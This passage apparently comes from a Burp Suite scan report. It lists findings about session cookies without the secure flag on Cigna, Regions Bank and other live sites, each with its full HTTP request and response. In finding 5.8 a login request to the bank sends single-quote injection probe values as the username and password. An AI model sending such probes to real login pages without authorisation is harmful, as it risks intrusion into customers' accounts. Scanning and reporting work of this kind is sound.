Set-Cookie: PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; Path=/
Content-Length: 0

5.3. https://cignaforhcp.cigna.com/wps/portal  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cignaforhcp.cigna.com
Path:   /wps/portal

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /wps/portal HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/
Cache-Control: max-age=0
Origin: https://cignaforhcp.cigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=92964B127FD1107FCAD3A536181C0CE6
Content-Length: 0

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:31:34 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 20913
ibm-web2-location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_ozADAyM_0-BAg9BgYwNfQ_1wkA6zeAMcwNFA388jPzdVvyA7rxwABvDatQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: no-cache
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID_CHCP=0001qDHqEZIhYEkdLt4C0F9Adey:1DE5MNIG9P; Path=/
Set-Cookie: PD_STATEFUL_31b6dc34-289d-11e0-8e97-2054895daa77=%2Fwps; Path=/
Content-Length: 20575


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" xmlns="http://www.w3.org/
...[SNIP]...
5.4. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
Origin: https://my.cigna.com
X-TeaLeaf-Page-Cui-Bytes: 1087
X-TeaLeaf-Page-Cui-Events: 2
X-TeaLeaf-Page-Dwell: 5810339
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.12.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: text/xml
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: BeforeUnload
X-TeaLeaf-Page-Url: /web/public/guest
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; MYCIGNA_OEP_JSESSIONID=0000yQIxVsxIeGgNdda8oLY1ni2:15ntus9ve; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=C5A87FF47FD9107F08B6A536181C0CE6; __utmz=252045595.1305563482.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; __utma=252045595.1041628650.1305559758.1305559758.1305563482.2; __utmc=252045595; PD_STATEFUL_e87abf76-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme
Content-Length: 266

<ClientEventSet PostTimeStamp="1305565653539" ><ClientEvent Count="2" Type="PERFORMANCE" SubType="BeforeUnload" MouseMove="False" Action="No Submit" TimeDuration="5810339" DateSince1970="1305565653539
...[SNIP]...

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Mon, 16 May 2011 17:07:36 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 107
surrogate-control: no-store
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000SfgkMCJXVtjzWixM8nxmOLM:15ntus9ve; Path=/
Set-Cookie: PD_STATEFUL_2af57d96-4b85-11e0-b595-20548963aa77=%2Fmycignatheme; Path=/
Content-Length: 107

...

<html>
<body>
Response

<hr>
Read 266 bytes in 1ms.

</body>
</html>
5.5. https://my.cigna.com/web/public/forgotid  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.cigna.com
Path:   /web/public/forgotid

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web/public/forgotid HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/forgotid/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTI4NAE30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAL0CXJU!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:24 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 18768
ibm-web2-location: /web/public/forgotid/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTI4NAE30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAL0CXJU!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: no-cache
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: TLTSID=6B62B67A7FD1107F1505D27393B522AB; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=6B62B67A7FD1107F1505D27393B522AB; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:24 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000swQewqb5KeLPS3KgAvdAzSA:15ngp48pp; Path=/
Set-Cookie: PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 18773


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...
5.6. https://my.cigna.com/web/public/forgotpassword  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.cigna.com
Path:   /web/public/forgotpassword

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web/public/forgotpassword HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/forgotpassword/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTIwMzI30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERABp4tfw!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:28 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 12125
ibm-web2-location: /web/public/forgotpassword/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTIwMzI30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERABp4tfw!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: no-cache
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: TLTSID=6DC2518C7FD1107F16169F9E7C82FB63; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=6DC2518C7FD1107F16169F9E7C82FB63; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:28 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000xdcAV8q-uIGQr0Dq1DrPDth:15ngp45tc; Path=/
Set-Cookie: PD_STATEFUL_d1425c42-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 12130


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...
5.7. https://securebank.regions.com/ForgottenPassword.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://securebank.regions.com
Path:   /ForgottenPassword.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ForgottenPassword.aspx HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R851515607; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:20:17 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=sg41ptigwefyqt55op0wstbb; path=/
Vary: Accept-Encoding
Content-Length: 15873


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML>
<HEAD>
       <title>Regions Online Banking</title>
       <link href="styles/styles.
...[SNIP]...
5.8. https://securebank.regions.com/login.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://securebank.regions.com
Path:   /login.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /login.aspx?brand=regions HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Cache-Control: max-age=0
Origin: https://www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 110

ignore=&locationZipCode=ZIP+Code&locationCity=City&locationState=State&googleSearch=&OnlineID=%27&Password=%27

Response

HTTP/1.1 301 Moved
Set-Cookie: securebank.regions.com-https=R812380214; path=/
Date: Mon, 16 May 2011 15:20:12 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
Set-Cookie: ASP.NET_SessionId=hndv2y55u1otew45h3eaarf0; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html
Content-Length: 0

5.9. https://sso.corp.cigna.com/corp/sso/professional/controller  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/professional/controller

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/professional/controller?command=forgotpwdbegin&PORTAL=professional&DESTINATION=https://cignaaccess.cigna.com/corp/portal/app/employer/secure/standard/MyEmployer HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:39 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTHID=741A6F2E7FD1107FC7C7A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=741A6F2E7FD1107FC7C7A536181C0CE6; Path=/; Domain=.cigna.com
Content-language: en
Set-cookie: JSESSIONID=0001aplKypDyIh3-IsriGvhcHmv:13agknsul; Path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>
<title>CIGNAaccess.com - Forgotten Password - Enter User Name</title>
<link rel="ST
...[SNIP]...
5.10. https://www.paperg.com/forgot.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.paperg.com
Path:   /forgot.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forgot.php HTTP/1.1
Host: www.paperg.com
Connection: keep-alive
Referer: http://www.paperg.com/publishers/flyerboard.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmb=27786045; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:45:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Set-Cookie: PHPSESSID=fq6c4o1f1f4ashphj9o9s9e8j3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 3158


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Con
...[SNIP]...
5.11. https://www.planservices.com/regions/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.planservices.com
Path:   /regions/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /regions/ HTTP/1.1
Host: www.planservices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: 01 Nov 1990 01:00:01 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT",policyref=/w3c/p3p.xml
Set-Cookie: TESTCOOKIES=Test;expires=Wed, 08-May-2041 16:46:14 GMT;path=/
Set-Cookie: CFID=52158672;expires=Wed, 08-May-2041 16:46:14 GMT;path=/
Set-Cookie: CFTOKEN=42630575;expires=Wed, 08-May-2041 16:46:14 GMT;path=/
Set-Cookie: JSESSIONID=0430e8dac9c0442b7260TR;path=/
Set-Cookie: PLANID=;path=/
Set-Cookie: GROUPID=;path=/
Set-Cookie: IID=;path=/
Set-Cookie: WEBUSAGE=124614;path=/
Set-Cookie: USERINTERNAL=0;path=/
Set-Cookie: VIRTDIR=regions;path=/
Date: Mon, 16 May 2011 16:46:14 GMT
Connection: close


<script type="text/javascript" language="javascript">
   var str="launch,Bisys_TopFrame.cfm"; //string value to designate calls
   var urlLocation = self.location.href.toLowerCase(); //string valu
...[SNIP]...
5.12. https://www.regions.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.regions.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WWW.REGIONS.COM-HTTP=R3434604483

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R939930197; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:42:00 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=w2u5uvedxyqp4gyfwhbipkjc; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 27843


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
5.13. https://www.regions.com/personal_banking.rf  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.regions.com
Path:   /personal_banking.rf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personal_banking.rf HTTP/1.1
Host: www.regions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R3758183026; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:19:42 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mgah42qkrasihqzk3dk3tq45; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 27887


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
5.14. https://wwwa.applyonlinenow.com/USCCapp/Ctl/entry  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://wwwa.applyonlinenow.com
Path:   /USCCapp/Ctl/entry

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /USCCapp/Ctl/entry?directMail=true&sc=UAASWI HTTP/1.1
Host: wwwa.applyonlinenow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 15:28:15 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2
Location: https://wwwa.applyonlinenow.com/USCCapp/static/error.html?error_code=1001
Content-Length: 0
Set-Cookie: JSESSIONID=0000wkGjL9NUQ6om08aGILL54g2:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1
Content-Language: en-US

5.15. https://cignaforhcp.cigna.com/ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cignaforhcp.cigna.com
Path:   /ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; JSESSIONID_CHCP=0001na8X0IINOPnLxTXec-srnIs:84FF2VLHC; PD_STATEFUL_dd717822-289d-11e0-8e97-2054895daa77=%2Fwps; JSESSIONID=0000PZ1yjRG2WKh36hwOt68f6X_:15eoj2var; PD_STATEFUL_db12e020-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6; PD_STATEFUL_fab19a1c-356c-11e0-b99e-2054895daa77=%2Fportal

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 318
content-type: text/plain
date: Mon, 16 May 2011 15:31:58 GMT
last-modified: Mon, 20 Dec 2010 18:20:32 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_32910a44-289d-11e0-8e97-2054895daa77=%2FProviderTheme; Path=/

..............(.......(....... ................................................................................................................    .......................    ......    ...............    .........
...[SNIP]...
5.16. https://cignaforhcp.cigna.com/portal/images/arrowonly_gold.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cignaforhcp.cigna.com
Path:   /portal/images/arrowonly_gold.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/images/arrowonly_gold.gif HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/wps/portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=92964B127FD1107FCAD3A536181C0CE6; JSESSIONID=0000m0b58O_Mt6JKcD_nHJ5-y0C:15eoj2vv7; PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; JSESSIONID_CHCP=0001na8X0IINOPnLxTXec-srnIs:84FF2VLHC; PD_STATEFUL_dd717822-289d-11e0-8e97-2054895daa77=%2Fwps

Response

HTTP/1.1 200 OK
accept-ranges: bytes
content-length: 63
content-type: image/gif
date: Mon, 16 May 2011 15:35:50 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_fab19a1c-356c-11e0-b99e-2054895daa77=%2Fportal; Path=/

GIF89a.............!.......,................|..@.fm.s..a...f..;
5.17. https://my.cigna.com/mycignatheme/js/min/jsTop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/js/min/jsTop.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/js/min/jsTop.js HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
